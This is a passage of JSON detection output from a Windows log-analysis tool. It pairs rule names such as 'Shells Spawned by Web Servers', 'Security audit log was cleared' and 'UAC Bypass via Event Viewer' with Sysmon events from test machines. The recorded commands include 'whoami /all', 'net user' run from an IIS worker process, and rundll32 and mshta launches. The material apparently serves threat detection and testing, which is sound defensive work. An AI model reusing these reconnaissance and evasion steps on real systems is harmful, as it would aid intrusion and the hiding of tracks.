(WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AE-607F-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A89-607F-0000-001028587700","ProcessId":4912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2021-04-20 20:33:13.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578503,"Execution":{"#attributes":{"ProcessID":3392,"ThreadID":4112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-20T20:33:13.741579Z"}},"Version":5}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AF-607F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A8A-607F-0000-0010E4717700","ProcessId":5280,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-20 20:33:14.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578505,"Execution":{"#attributes":{"ProcessID":3392,"ThreadID":4112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-20T20:33:14.273416Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32 url.dll,FileProtocolHandler ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-2842-5E1E-0000-0020FF3A7A00","LogonId":"0x7a3aff","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-2842-5E1E-0000-0010903C7A00","ParentProcessId":1628,"ProcessGuid":"747F3D96-2842-5E1E-0000-00100C417A00","ProcessId":4180,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 20:44:50.348"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":336,"Execution":{"#attributes":{"ProcessID":1840,"ThreadID":8032}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-01-14T20:44:50.353148Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32 url.dll,OpenURL ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-28B3-5E1E-0000-002057EB7B00","LogonId":"0x7beb57","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-28B3-5E1E-0000-0010CAEC7B00","ParentProcessId":1632,"ProcessGuid":"747F3D96-28B3-5E1E-0000-00101DF17B00","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 20:46:43.232"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":340,"Execution":{"#attributes":{"ProcessID":1840,"ThreadID":8032}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-01-14T20:46:43.237922Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /all","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Documents\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5B3A-5CC7-0000-002096080100","LogonId":"0x10896","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -s -NoLogo -NoProfile","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-65A9-5CC7-0000-00104E5C2400","ParentProcessId":3376,"ProcessGuid":"365ABB72-65AA-5CC7-0000-00104D882400","ProcessId":2116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-29 20:59:22.128"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8050,"Execution":{"#attributes":{"ProcessID":1896,"ThreadID":1820}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-29T20:59:22.144046Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":432901,"Execution":{"#attributes":{"ProcessID":856,"ThreadID":2200}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-18T11:06:25.485214Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"}}}}},{"detection":["MSHTA Spwaned by SVCHOST"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\System32\\mshta.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 (winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-19E0-5CDA-0000-0020CE701000","LogonId":"0x1070ce","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-965E-5CDA-0000-0010AF760000","ParentProcessId":596,"ProcessGuid":"365ABB72-19E0-5CDA-0000-001006711000","ProcessId":1932,"Product":"Internet 
Explorer","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 01:29:04.293"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17589,"Execution":{"#attributes":{"ProcessID":2000,"ThreadID":1960}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-14T01:29:04.306885Z"}},"Version":5}}}},{"detection":["Shells Spawned by Web Servers"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 -t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-49D6-5CE7-0000-001020A7A700","ParentProcessId":2580,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ProcessId":2404,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 
01:33:53.112"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1044,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-24T01:33:53.112486Z"}},"Version":5}}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ParentProcessId":2404,"ProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ProcessId":788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 
01:33:53.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1046,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-24T01:33:53.182587Z"}},"Version":5}}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=387577C0B3B89FEFCE983DC42CFF456A33287035,MD5=2041012726EF7C95ED51C15C56545A7F,SHA256=A0BE13AC9443ACC6D2EEA474CC82A727BDB7E1009F573DBA34D269F9A6AAA347,IMPHASH=FB687F4F7ACC1F20B5382A2C932A259E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"net user","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ParentProcessId":788,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010B6A2AC00","ProcessId":712,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 
01:33:53.162"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1047,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-24T01:33:53.192601Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\windows\\system32\\notepad.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a","UtcTime":"2020-07-09 22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311354,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:00:17.591137Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311355,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:00:17.591169Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 
22:00:31.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311361,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:00:31.218022Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"cmd.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\b","UtcTime":"2020-07-09 22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311367,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:00:45.590589Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"ba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311368,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:00:45.590736Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"powershell.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\c","UtcTime":"2020-07-09 
22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311375,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:01:03.900433Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"cba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311376,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:01:03.902259Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"eventvwr\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\d","UtcTime":"2020-07-09 22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311387,"Execution":{"#attributes":{"ProcessID":3148,"ThreadID":4088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:06:20.185045Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"dcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 
22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311388,"Execution":{"#attributes":{"ProcessID":3148,"ThreadID":4088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:06:20.185107Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\\\\tsclient\\c\\temp\\stack\\a.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\e","UtcTime":"2020-07-10 10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311413,"Execution":{"#attributes":{"ProcessID":3148,"ThreadID":4088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-10T10:20:37.672486Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
